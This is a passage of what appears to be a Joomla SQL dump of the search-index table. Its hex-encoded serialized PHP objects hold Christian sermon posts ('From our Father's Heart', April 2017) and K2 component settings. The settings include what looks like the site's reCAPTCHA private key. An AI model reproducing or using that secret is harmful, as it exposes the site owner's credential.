f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223136223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2234343a66726f6d2d6f75722d6661746865722d732d68656172742d32332d30342d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f34342d66726f6d2d6f75722d6661746865722d732d68656172742d32332d30342d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3434223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d34343a66726f6d2d6f75722d6661746865722d732d68656172742d32332d30342d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202832332f30342f3230313729223b733a31313a226465736372697074696f6e223b733a3337313a2220446561726c792042656c6f7665642c205175697420576f727279696e67212053746f7020776f727279696e672061626f757420746f6f206d616e79206973737565732e20576f7272792069732061206e6567617469766520656d6f74696f6e20616e64206e6567617469766520656d6f74696f6e206765747320796f75206f7574206f6620746865207a6f6e65206f66206372656174697669747920616e6420696e737069726174696f6e2e20576f72727920616e6420776f727279696e67206973206e6f7420476f64277320776179206f6620736f6c76696e6720796f75722070726f626c656d73206f72206272696e67696e6720736f6c7574696f6e7320746f206d6174746572732e20576f727279206d61676e6966696573207468652070726f626c656d732c20616e6420616c736f20656e6c61726765732074686520666163742074686174207468652070726f626c656d20697320696d706f737369626c6520746f20626520736f6c7665642e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30342d32332031353a33383a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30342d32332031353a33383a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(269, 'index.php?option=com_k2&view=item&id=45', 'index.php?option=com_k2&view=item&id=45:from-our-father-s-heart-30-04-2017', 'From our Father\'s Heart (30/04/2017)', ' Dearly Beloved, Take heed to your divine call! 2 Timothy 1:9 9 who has saved us and called us with a holy calling, not according to our works, but according to His own purpose and grace which was given to us in Christ Jesus before time began, If you are saved, there is a call upon your life and you must find that call. ', '2017-06-25 14:19:43', '9b17385c2cd5e976da292b295aa49620', 1, 1, 1, '*', '2017-04-30 15:51:00', '0000-00-00 00:00:00', '2017-04-30 15:51:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223435223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d33302d30342d32303137223b733a373a2273756d6d617279223b733a3336373a223c703e446561726c792042656c6f7665642cc2a03c2f703e0d0a3c703e54616b65206865656420746f20796f757220646976696e652063616c6c21c2a03c2f703e0d0a3c703e322054696d6f74687920313a393c2f703e0d0a3c703e392077686f2068617320736176656420757320616e642063616c6c65642075732077697468206120686f6c792063616c6c696e672c206e6f74206163636f7264696e6720746f206f757220776f726b732c20627574206163636f7264696e6720746f20486973206f776e20707572706f736520616e642067726163652077686963682077617320676976656e20746f20757320696e20436872697374204a65737573206265666f72652074696d6520626567616e2cc2a03c2f703e0d0a3c703e496620796f75206172652073617665642c20746865726520697320612063616c6c2075706f6e20796f7572206c69666520616e6420796f75206d7573742066696e6420746861742063616c6c2e3c2f703e0d0a223b733a343a22626f6479223b733a323135303a220d0a3c703e596f75206d7573742066696e64207468617420736163726564207468696e672e20596f75722064657374696e7920616e64207468652063616c6c2074686174205061756c20697320726566657272696e6720746f20696e20746865205363726970747572652061626f7665206172652074686f736520616374697669746965732c206475746965732c20726573706f6e736962696c69746965732c2061737369676e6d656e74732c20746861742069742077696c6c20616d6f756e7420746f2077617374696e6720476f64e28099732074696d6520696e206372656174696e6720796f7520696620796f7520646f206576657279206f74686572207468696e67206f6e2074686520656172746820616e6420796f7520646f6ee280997420646f207468656d2ec2a0c2a03c2f703e0d0a3c703e5768656e20492077617320696e207365636f6e64617279207363686f6f6c204920776173206120676f6f6420666f6f7462616c6c657220616e64204920776173206120676f6f64206174686c6574652e20492072616e2031353030206d657472657320726163652e204920706c6179656420666f6f7462616c6c20616e6420492077617320717569746520676f6f642e20492068616420656e6f7567682074616c656e7420696e20666f6f7462616c6c2061637475616c6c7920746f206861766520676f6e65206f6e20626563617573652049207374696c6c2072656d656d62657220736f6d65206f66207468652070656f706c65207468617420776520706c6179656420666f6f7462616c6c20746f67657468657220746861742077656e74206f6e20746f20706c617920666f7220636c7562732e204f6e65206f722074776f2070656f706c652077656e74206f6e20746f20706c617920666f7220746865206e6174696f6e616c207465616d20616e6420492068616420656e6f7567682074616c656e7420746f6f2e20c2a04920636f756c64206861766520646576656c6f70656420746861742074616c656e742e20427574206966204920626563616d65206120666f6f7462616c6c207374617220616e642049206469646ee2809974206265636f6d65206120706173746f7220616e642070726561636865722c20476f6420776f756c64206861766520636f6e73696465726564206d7920636f6d696e6720746f2074686520656172746820612077617374652e204e6f772c20492068617665206265636f6d652061207072656163686572206f662074686520476f7370656c20616e64206e6f74206120666f6f7462616c6c20737461723b206974206973206e6f7420612077617374652ec2a0c2a03c2f703e0d0a3c703e5468652063616c6c696e6720686173206e6f7468696e6720746f20646f207769746820796f7572206566666f7274732c2062757420616674657220796f75207265636569766564207468652063616c6c696e6720796f752077696c6c206e6f77206861766520746f206272696e6720796f7572206566666f727420696e746f2069742e2054686973206d65616e7320796f752063616ee2809974206d65726974207468652063616c6c696e67206f6620476f642e20c2a04974206d65616e73207468652063616c6c696e67206f6620476f6420697320736f6d657468696e67207468617420476f64206861732067696674656420796f7520666f722e20596f752063616ee280997420646f20656e6f75676820746f207175616c69667920666f72207468652063616c6c2e20536f20796f752063616ee28099742074616b65207468652063616c6c696e67206f6620476f6420616e642075736520697420666f7220796f7572206f776e20707572706f73652e204f6e65206f6620746865206d6f73742064616e6765726f7573207468696e67732077652063616e20646f20697320746f2074616b6520476f64e280997320696e74656e74696f6e20666f7220736f6d657468696e6720616e642075736520697420666f7220616e6f7468657220706572736f6ee280997320696e74656e74696f6e2ec2a0c2a03c2f703e0d0a3c703e4f6e6520646179207768656e20796f75207374616e64206265666f7265204a657375732c204865e2809973206e6f7420676f696e6720746f2061736b20796f7520686f77206d616e79206465677265657320796f75206f627461696e656420617320676f6f642061732074686f7365207468696e6773206172652e20427574204865e280997320676f696e6720746f2061736b20796f752c20e2809c44696420796f7520646f207768617420492073656e7420796f7520746f20646f3f20576861742057652070757420696e7369646520796f752c207768617420576520696e76657374656420696e7369646520796f752066726f6d2068656176656e2c2064696420796f752072656c6561736520697420746f206d616e6b696e643fe2809dc2a03c2f703e0d0a3c703e5468657265206973206e6f20626c657373696e67207468617420476f642063616e6e6f74206272696e6720696e746f20796f7572206c6966652069662069742077696c6c2066756c66696c6c2048697320707572706f736520616e64207468657265206973206e6f20626c657373696e672048652063616e6e6f742077697468647261772066726f6d20796f7572206c6966652069662069742077696c6c2066756c66696c6c2048697320707572706f73652e20476f64206973206e6f7420636f6d6d697474656420746f206f757220636f6d666f72742062757420746f2048697320707572706f736520696e206f7572206c697665732ec2a0c2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a65737573c2a03c2f703e0d0a3c703e476f6427732053657276616e742c3c2f703e0d0a3c703e526576204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30352d31342031363a30393a3139223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a223122